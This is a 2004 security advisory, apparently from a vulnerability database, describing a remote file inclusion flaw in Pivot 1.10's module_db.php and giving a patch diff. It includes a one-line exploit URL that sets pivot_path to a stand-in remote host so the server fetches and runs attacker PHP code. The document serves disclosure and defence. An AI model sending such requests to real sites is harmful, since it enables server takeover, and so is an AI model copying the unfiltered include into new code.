[UNIX] Pivot Remote Code Execution Vulnerability

2004-06-18T00:00:00
ID SECURITYVULNS:DOC:6366
Type securityvulns
Reporter Securityvulns
Modified 2004-06-18T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


Pivot Remote Code Execution Vulnerability

SUMMARY

" <http://www.pivotlog.net/> Pivot is a web-based tool to help you maintain dynamic sites, like weblogs or online journals. Pivot is released under the GPL so it is completely free to use. It is written in PHP, and does not require additional libraries or databases to function".

Remote code execution is possible through Pivot by remote file inclusion. Malicious PHP code can then be executed under the privileges of the user running the PHP scripts running Pivot.

DETAILS

Vulnerable Systems: * Pivot version 1.10

Immune Systems: * Pivot version 1.14

The vulnerability lies within the class file called module_db.php that can be accessed individually. By supplying a fake path, the attacker is able to include any file desirable, which could also contain malicious PHP code. The code is running at the context of the user normally running the Pivot scripts. A small code excerpt is shown below: // for now, we'll just use the xml / flat-file module.. include_once $pivot_path."modules/module_db_xml.php";

class db {

No check of filtering whatsoever is performed in module_db.php, assuming that it is only called from known locations with well-formed input. However, the file can be accessed individually. These two factors give rise to the security issue.

The idea behind this is to include this file somewhere else within the code execution so that $pivot_path is properly set. However if register_globals is set to on within php.ini the attacker is able to hijack the variable $pivot_path and point it to somewhere else ("http://xxxxx/includes/module_db_xml.php".)

A simple way to exploit the vulnerability might look something along the lines of: http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx

Patch Availability: A new version of Pivot is available for download. Users are highly advised to perform the transition. If for some reason they choose not to, the following fix can be applied to remedy the situation: --- module_db.php Wed Feb 11 16:29:04 2004 +++ module_db.phpfix Fri May 28 22:36:07 2004 @@ -10,6 +10,10 @@ // Patch to fix remote include - loofus (0x90) //

+/ Make sure user cannot include remote files / +if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) || isset($_COOKIE['pivot_path'])) + die("No remote include for you!\n"); + // for now, we'll just use the xml / flat-file module.. include_once $pivot_path."modules/module_db_xml.php";

ADDITIONAL INFORMATION

The information has been provided by ">loofus.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.